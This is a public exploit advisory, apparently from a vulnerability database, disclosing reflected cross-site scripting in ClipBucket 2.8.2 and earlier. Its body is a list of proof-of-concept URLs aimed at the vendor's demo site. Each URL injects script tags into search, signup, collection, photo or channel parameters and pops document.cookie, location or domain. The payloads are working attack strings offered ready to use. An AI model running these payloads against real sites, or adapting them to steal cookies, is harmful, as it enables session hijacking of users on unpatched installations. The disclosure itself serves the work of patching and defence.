ClipBucket 2.8.2 Cross Site Scripting

2017.03.20
Credit: NoGe
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: ClipBucket <= Multiple Cross-Site Scripting Vulnerabilities # Google Dork: n/a # Date: March 20 2017 # Exploit Author: NoGe # Vendor Homepage: https://clipbucket.com/ # Download: https://github.com/arslancb/clipbucket/archive/4476.zip # Version: 2.8.2, 2.8.1 and below # Tested on: Kali Linux # Proof of Concept (Demo Site) https://demo.clipbucket.com/signup.php?mode=login </script>"><script>prompt(document.cookie)</script> https://demo.clipbucket.com /search_result.php?query=NoGe&type=videos</script>"><script>prompt(document.location)</script> https://demo.clipbucket.com /collections.php?cat=all</script>"><script>prompt(document.domain)</script>&sort=view_all&time=all_time&page=1&seo_cat_name=All&sorting=sort https://demo.clipbucket.com /collections.php?cat=all&sort=view_all&time=all_time&page=1&seo_cat_name=All</script>"><script>prompt(document.cookie)</script>&sorting=sort https://demo.clipbucket.com /photos.php?cat=all</script>"><script>prompt(document.location)</script>&sort=view_all&time=all_time&page=1&seo_cat_name=All&sorting=sort https://demo.clipbucket.com /photos.php?cat=all&sort=view_all&time=all_time&page=1&seo_cat_name=All</script>"><script>prompt(document.domain)</script>&sorting=sort https://demo.clipbucket.com /channels/all/All/view_all</script>"><script>prompt(document.cookie)</script>/all_time/1&sorting=sort/ https://demo.clipbucket.com /collections/all/All/most_recent</script>"><script>prompt(document.domain)</script>/all_time/1&timing=time/ Regards. -- NoGe


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top